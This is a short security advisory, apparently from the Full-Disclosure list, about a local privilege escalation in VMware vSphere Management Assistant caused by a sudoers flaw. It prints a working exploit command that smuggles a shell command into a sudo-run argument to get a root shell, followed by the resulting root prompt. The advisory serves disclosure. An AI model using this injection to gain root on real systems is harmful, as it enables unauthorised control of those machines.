======================================================================= Vmware vSphere Management Assistant (vMA) - Local Privilege Escalation ======================================================================= Affected Software : Vmware vSphere Management Assistant (vMA) Severity : Medium Local/Remote : Local Author : @drk1wi [Summary] Due to an error in the /etc/sudoers file it is possible to run arbitrary shell commands within the context of root user. [Vulnerability Details] [vi-admin@vMA ~]$ sudo /usr/bin/vmatargetcon --shell=/bin/bash "'raz';/bin/bash;" 35|ERROR|1|Unable to resolve hostname. [root@vMA vi-admin]# [Time-line] 27/04/2010 - Vendor notified 28/04/2010 - Vendor response ??? - Vendor patch release 16/05/2011 - Public disclosure [Fix Information] Edit the /etc/sudoers file. Cheers, @drk1wi _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/